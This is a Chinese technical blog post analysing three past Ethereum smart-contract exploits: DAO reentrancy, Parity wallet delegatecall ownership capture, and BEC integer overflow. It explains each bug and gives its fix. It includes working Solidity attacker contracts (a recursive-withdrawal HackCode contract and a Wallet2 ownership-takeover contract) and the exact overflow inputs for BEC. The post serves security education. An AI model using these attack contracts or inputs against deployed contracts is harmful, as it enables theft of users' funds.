以太坊合约漏洞大集锦——分析、模拟与重现

最新推荐文章于 2023-05-11 15:04:17 发布
最新推荐文章于 2023-05-11 15:04:17 发布
阅读量3.1k 收藏 7
点赞数
分类专栏: BlockChain Solidity 文章标签: 以太坊合约 漏洞 bug 汇总
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JohnnyMartin/article/details/83784421
版权

以太坊的智能合约,自 DAO以来,漏洞就没断过,觉得有必要做一下汇总,以为鉴。

1,The DAO 漏洞。

该漏洞直接导致了以太坊的分叉。应该算是最有名的明星漏洞了。
我们将源码的无关部分剔除,只剩关键代码。看模拟源码:

pragma solidity ^0.4.18;
contract TheDAO{
	//这两个函数为方便测试,额外加的,原合约中并没有。
    function getBanalce() public view returns(uint){
        return address(this).balance;
    }
    function deposit()public payable{
    }
    
    function splitDAO()public{
        withdrawRewardFor(msg.sender);
    }
    function withdrawRewardFor(address _account)public{
        uint reward = 10**17;
        if (!payOut(_account, reward))  throw;
    }
    
    function payOut(address _recipient, uint _amount) returns (bool) {
        if (_recipient.call.value(_amount)()) {//假如_recipient是一个合约地址,此调用会触发_recipient的回退函数,并且,call命令不会限制本次调用的gas。
            return true;
        } else {
            return false;
        }
    }
   
    function () public payable{ }
}

contract HackCode{
    address public daoContract;
    uint public count =  50;
    uint public n;
    function setDAO(address _addr)public{
        daoContract = _addr;
    }
    function getBanalce() public view returns(uint){
        return address(this).balance;
    }
    
    function withdraw()public{
        msg.sender.transfer(address(this).balance);
    }
    
    function setCount(uint newCount)public {
        count = newCount;
    }
    function () public payable{
        if(n < count){
            n++;// 限制递归次数,防止out of gas,那样整个递归调用链都会回滚。
            TheDAO(daoContract).splitDAO();
        }
    }
}

原因基本都写在注释里了:call方法有可能触发回退函数,并且未限制本次call的gasLimit(transfer与send会限制在2300——这个数量不足以支付一次哪怕最简单的函数调用的花费)。所以要想更正bug,只需将

if (_recipient.call.value(_amount)())

改为

if (_recipient.send(_amount))

即可。
注:黑客实际使用的攻击合约可以查得到字节码,但是源码无从获得,反编译可读性也不好,此处依照个人理解做了一个实现,如有不当之处,欢迎指正。

2,Parity 钱包

该bug是由于使用了delegatecall方法引起的,导致黑客拿到了owner权限
bug威力:黑客转移几千万美元的eth,并销毁了WalletLibrary 合约,导致一部分Wallet合约中的剩余eth(300w个)永远取不出来了。
部分源码:


contract WalletLibrary {
  modifier onlyowner {
    if (isOwner(msg.sender))
      _;
  }
  modifier onlymanyowners(bytes32 _operation) {
    if (confirmAndCheck(_operation))
      _;
  }
  modifier only_uninitialized { if (m_numOwners > 0) throw; _; }
  
  function isOwner(address _addr) constant returns (bool) {
    return m_ownerIndex[uint(_addr)] > 0;
  }
  
  function initMultiowned(address[] _owners, uint _required) only_uninitialized {
    m_numOwners = _owners.length + 1;
    m_owners[1] = uint(msg.sender);
    m_ownerIndex[uint(msg.sender)] = 1;
    for (uint i = 0; i < _owners.length; ++i)
    {
      m_owners[2 + i] = uint(_owners[i]);
      m_ownerIndex[uint(_owners[i])] = 2 + i;
    }
    m_required = _required;
  }

  function initWallet(address[] _owners, uint _required, uint _daylimit) only_uninitialized {
    initDaylimit(_daylimit);
    initMultiowned(_owners, _required);
  }
  function kill(address _to) onlymanyowners(sha3(msg.data)) external {
    suicide(_to);
  }
}

contract Wallet {
	uint public m_required;
  uint public m_numOwners;

  uint public m_dailyLimit;
  uint public m_spentToday;
  uint public m_lastDay;

  // list of owners
  uint[256] m_owners;
  address constant _walletLibrary = 0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4;
  function Wallet(address[] _owners, uint _required, uint _daylimit) {
    bytes4 sig = bytes4(sha3("initWallet(address[],uint256,uint256)"));
    address target = _walletLibrary;
    uint argarraysize = (2 + _owners.length);
    uint argsize = (2 + argarraysize) * 32;

    assembly {
      mstore(0x0, sig)
      codecopy(0x4,  sub(codesize, argsize), argsize)
      delegatecall(sub(gas, 10000), target, 0x0, add(argsize, 0x4), 0x0, 0x0)
    }
  }

  function() payable {
    if (msg.value > 0)
      Deposit(msg.sender, msg.value);
    else if (msg.data.length > 0)
      _walletLibrary.delegatecall(msg.data);
  }
}

问题出在initWallet函数这里,乍一看,有一个only_uninitialized modifier 防止多次调用。其实这里有个隐藏的漏洞:
Wallet 合约通过delegate来调用walletLibrary 合约的initWallet方法是没有问题的,only_uninitialized能够防止Wallet 多次调用initWallet。但是,如果我们构造一个Wallet2合约来调用walletLibrary 合约的initWallet方法,此时only_uninitialized读的owner是位于Wallet2中的owner——这个owner可以被任意赋值,于是Wallet2可以轻松拿到walletLibrary 中的owner权限。
黑客合约可以这样构造:

contract Wallet2 {
	uint public m_required;
  uint public m_numOwners;

  uint public m_dailyLimit;
  uint public m_spentToday;
  uint public m_lastDay;
 
  // list of owners
  uint[256] m_owners;
  mapping(uint => uint) m_ownerIndex;
  address constant _walletLibrary = 0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4;

	function attack()public{
		m_ownerIndex[this] = 1;
		 bytes4 sig = bytes4(sha3("initWallet(address[],uint256,uint256)"));
		_walletLibrary.delegatecall(sig, [this], 0, 0);//这里会顺利调用到initWallet函数,并把this设置为owner
		..........//可以为所欲为了
	}
}

根本原因在于:delegatecall调用其他合约的代码,存储仍然用的当前合约的环境,导致丧失owner权限。
教训:慎用delegatecall,因为它的行为严重与人的直觉不符,极易造成漏洞。
另外,黑客在取得了owner权限之后,拿了一些eth,然后把_walletLibrary销毁了。。。。其他人再也拿不出Wallet中剩余的eth了,浪费啊。。。

3,美图币BeautyChain (BEC)的漏洞

这个漏洞理解起来比DAO漏洞要容易得多:未进行乘法的溢出检查。
关键代码:


library SafeMath {
  function mul(uint256 a, uint256 b) internal constant returns (uint256) {
    uint256 c = a * b;
    assert(a == 0 || c / a == b);
    return c;
  }

  function div(uint256 a, uint256 b) internal constant returns (uint256) {
    // assert(b > 0); // Solidity automatically throws when dividing by 0
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold
    return c;
  }

  function sub(uint256 a, uint256 b) internal constant returns (uint256) {
    assert(b <= a);
    return a - b;
  }

  function add(uint256 a, uint256 b) internal constant returns (uint256) {
    uint256 c = a + b;
    assert(c >= a);
    return c;
  }
}

contract BeautyChain{
    using SafeMath for uint256;
    mapping (address => uint256) public balances;
    
    function batchTransfer(address[] _receivers, uint256 _value) public  returns (bool) {
        uint cnt = _receivers.length;
        uint256 amount = uint256(cnt) * _value; // <====这个乘法有可能溢出
        require(cnt > 0 && cnt <= 20);
        require(_value > 0 && balances[msg.sender] >= amount);
    
        balances[msg.sender] = balances[msg.sender].sub(amount); 
        for (uint i = 0; i < cnt; i++) {
            balances[_receivers[i]] = balances[_receivers[i]].add(_value);
        }
        return true;
      }
}

攻击者使 uint256(cnt) * _value 溢出后恰好等于0:让cnt = 2, _value = 2^128。溢出后,amount = 0,require(_value > 0 && balances[msg.sender] >= amount);可以被完美的绕过。
接下来进了for循环,就直接add(_value),而此时的value是 2^128 。。。。

发起攻击的交易:https://etherscan.io/tx/0xad89ff16fd1ebe3a0a7cf4ed282302c06626c1af33221ebe0d3a470aba4a660f

改正漏洞很简单,只需将:

uint256 amount = uint256(cnt) * _value;

改为

uint256 amount = _value.mul(uint256(cnt));

即可。

JohnnyMartin
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
偷天换日合约易主,地址变脸移花接木 |成都链安漏洞分析连载第四期 —— 底层函数误用漏洞
链安科技的博客
08-10 503
  针对区块链安全问题,成都链安科技团队每一周都将出智能合约安全漏洞解析连载,希望能帮助程序员写出更加安全牢固的合约,防患于未然。   引子:阵有纵横,天衡为梁,地轴为柱。梁柱以精兵为之,故观其阵,则知精兵之所有。共战他敌时,频更其阵,暗中抽换其精兵,或竟代其为梁柱,势成阵塌,遂兼其兵。并此敌以击他敌之首策    ——《三十六计第二十五计之偷梁换柱》   却说“重入”“竞态”里应...
以太坊君士坦丁堡漏洞分析
飞久
01-18 443
这两天关于以太坊延迟君士坦丁堡升级的报导铺天盖地,可惜到现在都没看到一篇能把这个漏洞讲透彻的,就由我来给大家解密吧。 上一篇文章给大家介绍过EIP 1283,是为了优化SSTORE指令的gas计算方式的,这次的漏洞就出在这个EIP上,可能会导致“重入攻击”。 1.什么是“重入攻击” 所谓“重入攻击”,指的是在同一笔交易中,合约A调用合约B,而合约B又反过来调用合约A的现象。 这种情况是必须被禁止的...
以太坊漏洞分析————1、溢出漏洞
Fly_鹏程万里
12-17 1087
事件回顾 2018年4月22日,黑客对BEC智能合约发起攻击,凭空取出 57,896,044,618,658,100,000,000,000,000,000,000,000,000,000,000,000,000,000,000.792003956564819968 个BEC代币并在市场上进行抛售,BEC随即急剧贬值,价值几乎为0,该市场瞬间土崩瓦解。 2018年4月25日,SMT项目方发现其...
以太坊漏洞分析————3、竞态条件漏洞
Fly_鹏程万里
12-17 610
引子:至道问学之有知无行,分温故为存心,知新为致知,而敦厚为存心,崇礼为致知,此皆百密一疏。                                                                                                                                                         ...
‘冰封’合约背后的老牌劲敌 | 链安团队漏洞分析连载第二期 —— 拒绝服务漏洞
链安科技的博客
07-26 458
针对区块链安全问题,链安科技团队每一周都将出智能合约安全漏洞解析连载,希望能帮助程序员写出更加安全牢固的合约,防患于未然。 引子:秦人不暇自哀,而后人哀之;后人哀之而不鉴之,亦使后人而复哀后人也。                                                       —— 《阿房宫赋》 上回讲到 溢出漏洞引增发,币值一落千万丈,黑客造假本领大,Saf...
MS Excel 使用方法与精通集锦——163种技巧
10-09
MS Excel 使用方法与精通集锦——163种技巧(超全).
PHP4新函数集锦——输出信息控制函数.pdf
最新发布
01-05
PHP4 新函数集锦——输出信息控制函数 PHP4 新函数集锦——输出信息控制函数是 PHP4 中的一组新的函数集锦,旨在提供更好的输出信息控制功能。这些函数可以帮助开发者更好地控制脚本的输出信息,使其更加灵活和可靠...
tableau可视化分析-案例集锦--Tableau与R实现预测
02-07
tableau可视化分析-案例集锦--Tableau与R实现预测
2019-2020年高考生物大题集锦——遗传及变异一.doc
10-10
2019-2020年高考生物大题集锦——遗传及变异一.doc
Excel使用技巧最新集锦——163种技巧
12-17
你还在苦苦寻找Excel使用技巧最新集锦——163种技巧吗?你还在为Excel使用技巧最新集锦——163种技巧而烦...该文档为Excel使用技巧最新集锦——163种技巧,是一份很不错的参考资料,具有较高参考价值,感兴趣的可以...
《我学区块链》—— 十、以太坊安全之 漏洞清单
xuguangyuansh的博客
06-15 1791
十、以太坊合约安全 &amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;nbsp;遵循 ERC2
初入以太坊,学习调研智能合约——智能合约面临的安全威胁和漏洞类型
Mr_Rui_Rui的博客
09-13 661
1、重入攻击 恶意合约A调用某一合约B,让合约B给A转账,恶意合约A在fallback函数中回调合约B给A转账的函数,该函数使用call进行转账因此没有gaslimit限制,并且B记录的A的金额减少是在转账之后。 可重入攻击也就是攻击方发送一笔交易,导致合约一致重复执行直到将合约账户的资源消耗完。这有点类似于C语言的递归函数。攻击方能成功进行可重入攻击,主要依赖于Soildity为智能合约提供的fallback和call函数 以太坊的智能合约,可以声明一个匿名函数(unnamed function)
智能合约_智能合约代码层漏洞小记
weixin_39867509的博客
12-18 797
一.前言这周由于兴(lao)趣(shi)趋(yao)势(qiu),阅读了几篇以太坊智能合约安全综述,对其中的几个代码层漏洞进行整理归纳,并结合安全事件与相关案例进行分析,如有不正确的地方,还望各位大佬多多指正。二.以太坊智能合约程序编程模型1.程序结构以太坊上的智能合约主要是通过Solidity进行编写,Solidity是一种具有面向对象性质的弱类型语言。在以太坊上部署智能合约时,开发人...
以太坊智能合约漏洞安全测试
HurryPotter
05-09 1236
以太坊智能合约漏洞安全测试 演练平台地址:https://capturetheether.com/challenges/lotteries/guess-the-new-number/ 参考文档:https://www.anquanke.com/post/id/154104 1 Warmup 1.1 Deploy a contract 题目要求: InstallMetaMask. Switch to theRopsten test network. Get some Ropst...
以太坊智能合约安全漏洞之整数溢出漏洞的原理与解决方法
StevenX5
04-30 3893
以太坊虚拟机 (EVM) 为整数指定固定大小的数据类型。这意味着一个整数变量,只能表示一定范围的数字。例如uint8 只能存储 [0,255] 范围内的数字。尝试将 256 存储到 uint8 将导致 0。如果不小心,用户输入未被检查,并且执行的计算结果超出了存储它们的数据类型的范围,那么 Solidity 中的变量可能会被利用。本文通过整数溢出漏洞原理的阐述,并结合 Solidity 智能合约实例代码的演示,介绍了一种智能合约整数溢出漏洞及其解决方法。
以太坊钱包私钥爆破产业链和攻击案例
Websec
05-11 3540
mt19937_64 和 random_device 的随机算法有着本质的区别,mt19937_64 是确定性的,它的随机性依赖于输入的随机数,并不产出新的随机性。如果我们想要穷举以太坊账号,找到 Vitalik 的私钥,那么在知道他的公钥后,最多需要进行 2^256 (2 的 256 次方)次的 Q = kG 计算,对大数字我们天然不敏感,所以我把它换算成工作量,就是目前一台苹果 M1 电脑大概 40M/s 的速率,那么大概需要的年份是 8 后面跟上 62 个零。一万年太久,只争朝夕。
以太坊Solidity智能合约安全之短地址或参数攻击漏洞的原理及预防
StevenX5
05-19 1623
这个漏洞发生在第三方合约或应用程序调用智能合约时。当将参数传递给智能合约时,参数将根据 ABI 规范进行编码。第三方合约可以发送比预期参数长度短的编码参数。在这种情况下,EVM 将在编码参数的末尾填充 0,以弥补预期的长度。这样,当智能合约不验证输入时,这就会成为一个问题。最明显的例子是,当用户请求提款时,交易所不验证 ERC20 令牌的地址。本文介绍了以太坊Solidity智能合约的短地址/参数攻击漏洞原理、攻击方法和预防措施。
对重入漏洞分析,复现以及修复方案
m0_68764244的博客
06-12 2491
以太坊中,智能合约能够调用其他外部合约的代码,由于智能合约可以调用外部合约或者发送以太币,这些操作需要合约提交外部的调用,所以这些合约外部的调用就可以被攻击者利用造成攻击劫持,使得被攻击合约在任意位置重新执行,绕过原代码中的限制条件,从而发生重入攻击。重入攻击本质上与编程里的递归调用类似,所以当合约将以太币发送到未知地址时就可能会发生。简单的来说,发生重入攻击漏洞的条件有 2 个:调用了外部的合约且该合约是不安全的 外部合约的函数调用早于状态变量的修改假设:智能合约A有函数F1,攻击合约B有函数F2。F1
三天竟然爆发两起大漏洞事件!我们来教你如何跳过以太坊的坑
区块链大本营
04-26 7361
“现在进入你还是先行者,最后观望者进场才是韭菜。”美图董事长蔡文胜在三点钟群中的预言一语成谶。在4月22日,随着BEC智能合约漏洞的爆出,一行代码蒸发了644727768...
大数据分析工程师面试集锦3-sql/sparksql/hiveql
06-28
好的,以下是大数据分析工程师面试集锦3中关于sql/sparksql/hiveql的问题和回答: 1. 什么是SQL? SQL(Structured Query Language)是一种用于管理关系型数据库的标准语言,它可以用来查询、插入、更新和删除数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值